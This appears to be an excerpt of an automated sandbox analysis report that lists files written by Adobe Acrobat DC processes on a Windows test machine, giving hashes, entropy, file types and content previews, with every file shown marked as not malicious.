SHA-512:	4CD703A48A67E24EACB018F8B0A12069C972F83FF0349F644FC1529B5B4BE8E2CCA8FFD7EA5601A7ED2B7E13A7DCE7176C47C708D97D458A39710779A1068022
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380845594279765","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":120662},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\c044e354-944b-48f6-8cb4-8b605f9923f9.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.977971331588537
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqBEsBdOg2H/caq3QYiubInP7E4T3y:Y2sRdsedMHO3QYhbG7nby
MD5:	0A8473C945879ECF7B64E80A61F14097
SHA1:	A0FF639D72810DC3CD35A5E568CD9CD96AAA2C8F
SHA-256:	B5A6668AAF43D6A66E29571604C4C825CA005BEBF243B146A3529648DE2E398F
SHA-512:	4CD703A48A67E24EACB018F8B0A12069C972F83FF0349F644FC1529B5B4BE8E2CCA8FFD7EA5601A7ED2B7E13A7DCE7176C47C708D97D458A39710779A1068022
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380845594279765","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":120662},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4320
Entropy (8bit):	5.257007371298267
Encrypted:	false
SSDEEP:	96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7YzPeK:etJCV4FiN/jTN/2r8Mta02fEhgO73goy
MD5:	C00B93B7A27A2BFB280791258D8A7E54
SHA1:	0541CA7939C4738A30DE6689FD20741DA93FFBB5
SHA-256:	77F08670C082C99D04397860101C909FDD8E8A2CE6959118C8354CB8165B628A
SHA-512:	F9F7E12D53046D4ED8DD6D8ED4F9828CFC446A9DA825570078720A0CEC05019B91BA1FBDB6CDAFFE965D32F5AF2FCE4613E175F18ADD265D5FD99FAF3BBC4819
Malicious:	false
Preview:	*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..\|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.177588260308499
Encrypted:	false
SSDEEP:	6:iOp/WfN+q2Pwkn2nKuAl9OmbzNMxIFUtL/WwEWZmwl/WwzVkwOwkn2nKuAl9Ombg:7p/WfN+vYfHAa8jFUtL/WwEW/l/WwzVj
MD5:	E68EFA1036534323E195974A38455F21
SHA1:	0AD2A1B86564F8D1AF63B6B4EC12F3B32E2369ED
SHA-256:	80A6A97057F01D5A1A71D31E9F24A22BD83BDF30EADC388145A73CCE2A24F318
SHA-512:	25E9FF4848A8D6A1E7E19F349F02F5EDAA0D717CDCCDB9DC0A824C7FBF50F51D74D1449C833F1219940680F1714171610234E3214BFDE48050BAF72C08DD6BC4
Malicious:	false
Preview:	2025/01/07-16:33:01.871 1fec Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-16:33:01.872 1fec Recovering log #3.2025/01/07-16:33:01.872 1fec Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.177588260308499
Encrypted:	false
SSDEEP:	6:iOp/WfN+q2Pwkn2nKuAl9OmbzNMxIFUtL/WwEWZmwl/WwzVkwOwkn2nKuAl9Ombg:7p/WfN+vYfHAa8jFUtL/WwEW/l/WwzVj
MD5:	E68EFA1036534323E195974A38455F21
SHA1:	0AD2A1B86564F8D1AF63B6B4EC12F3B32E2369ED
SHA-256:	80A6A97057F01D5A1A71D31E9F24A22BD83BDF30EADC388145A73CCE2A24F318
SHA-512:	25E9FF4848A8D6A1E7E19F349F02F5EDAA0D717CDCCDB9DC0A824C7FBF50F51D74D1449C833F1219940680F1714171610234E3214BFDE48050BAF72C08DD6BC4
Malicious:	false
Preview:	2025/01/07-16:33:01.871 1fec Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-16:33:01.872 1fec Recovering log #3.2025/01/07-16:33:01.872 1fec Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250107213305Z-180.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
Category:	dropped
Size (bytes):	71190
Entropy (8bit):	0.8418671210517596
Encrypted:	false
SSDEEP:	192:sUN7PgaFJ8+qGHJMojKfSABQs9CYVM6ZqJ:lN7PgaFJRpM9SQ9ZO6S
MD5:	933F69148EC45D9BE56D7063450F1E63
SHA1:	DEB748BA75E554DF6DA9A1D89845A4B2F06F7ED5
SHA-256:	6F21ED09C2F9482741E3496F85B3505F4732EF58E202AAC13D0C43AED9175074
SHA-512:	13961034EF9C7B9BAFBAA607D40B1CFD1B2D260514D480F16929CEC866432C1998BB426DF4A4E3784FCCD958817C7BF727BDC36A3927C40D1F3140FDDD170809
Malicious:	false
Preview:	BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 16, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 16
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.445164594700856
Encrypted:	false
SSDEEP:	384:CeNci5tGiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:hJs3OazzU89UTTgUL
MD5:	3891E2DCC0C510F5456DDEC55CABA331
SHA1:	FB3CBF77F09087AAE34848B731DE46B5F56238B8
SHA-256:	8CDC3AE2436018DF4474D20480A40B2942C670998AC82FEDBA0520719CF22E65
SHA-512:	C20496AD4F51D0B2F97024B0C1EE8619DBADC33BCACB2405150B1D151DE377128BC169B88D7A6E91DD96689B906DB3225947F1EB77CC6D36EBF37B13C0210521
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	2.213211715387476
Encrypted:	false
SSDEEP:	24:7+tJmnuwKKRqL7zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf97:7M0nCiq/mFTIF3XmHjBoGGR+jMz+Lhd
MD5:	DCC0E11440FC251C684D51DEFE396492
SHA1:	BADFEFFA5B75B2882A79A7E80352968F15924527
SHA-256:	D2CDC62548204758B92359131D4B6EBE4507A1CF17BCD97292A43CDA832C4086
SHA-512:	A22DFEEE0DAC1E302068E6038BAD0243D18D5E6ED1453572BACEDEC8B60B054752CE8F12DF061DDA34C235F7EC4B1B6210BCC2A8D1E6D82658F640E3B4005193
Malicious:	false
Preview:	.... .c.....[..P........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.746484906506307
Encrypted:	false
SSDEEP:	3:kkFklxikfllXlE/HT8kHJltNNX8RolJuRdxLlGB9lQRYwpDdt:kKh9T8CJdNMa8RdWBwRd
MD5:	F07E778F7D389253659FA7DBE9D4B39A
SHA1:	A6F08ACE2EFB0F71691B51B4546D5E6AAED96C21
SHA-256:	CEDB5FE89BADDD6343F662DE3DE7893216668640D65EE88D34ED89B3CAC6E533
SHA-512:	9405F344619EEAD6FD3609E6BAA276975F7971D11AC4D9594CEA0109EE584F517DECD673A621577A4C4F00B1EAE266B8D1FF258F3E0996393484D15FD1C98FD8
Malicious:	false
Preview:	p...... .........q#.Ka..(....................................................... ..........W....me..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.240186510507009
Encrypted:	false
SSDEEP:	6:kK9qi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:8dDImsLNkPlE99SNxAhUe/3
MD5:	6CDF7E7ADC35E58D34474A2D346000BF
SHA1:	71E2E867F0A0F28DC329153607C13B46463D56CE
SHA-256:	30B2B27F1C31147396CD0D49A4185DAE1A9D79768FB8786AF927C9A3075A1DD1
SHA-512:	D3C19A0D91D29EE0F5AC9DFB78DA4BE56F8D8434ABF9D416F8CA7591211F3014D01E75E8F224E63B9F3E54C87E4E4875B6721187EE622570934DB329998570C2
Malicious:	false
Preview:	p...... ........Tg^.Ka..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7760

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7760

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.368377680470697
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJM3g98kUwPeUkwRe9:YvXKXBcMIWEZc0vS5GMbLUkee9
MD5:	C31BF1F1E43DE36AAC87FE36B16D694C
SHA1:	8AD27AD513624CEE4F43DB804F3979F79BA107B4
SHA-256:	1CDCBE2425FC2FBC9B890A053B26FAE35AA1288D0A5CB60C36F0A95C2200B507
SHA-512:	EBFDF214E245EB4D2071DC5E12B1E72A80AAEDE9D3959A0D98AAFC6BA5089699CA80BA67559DA85706539FF2FF6E1401855B44959CE21E34F5815981FBFE0160
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.319896273028245
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJfBoTfXpnrPeUkwRe9:YvXKXBcMIWEZc0vS5GWTfXcUkee9
MD5:	6E49DD3FE3AE16F532E5CC90777D87B5
SHA1:	B6DA77B87910F42F3BDB035A61FA733A1496326C
SHA-256:	D20EC4BB8CD75A9B644A006FC5781A2E6165A7DC1B8CCCC7B429E55EA970DB2D
SHA-512:	43155B26DE21B774B719DBDC68D3D381588872C375ACE0436B21560AC15F0B1C4F07727DB89A331DDA7B94ABD0E1E477E3C3A3161A538340E972926A5215A224
Malicious:	false
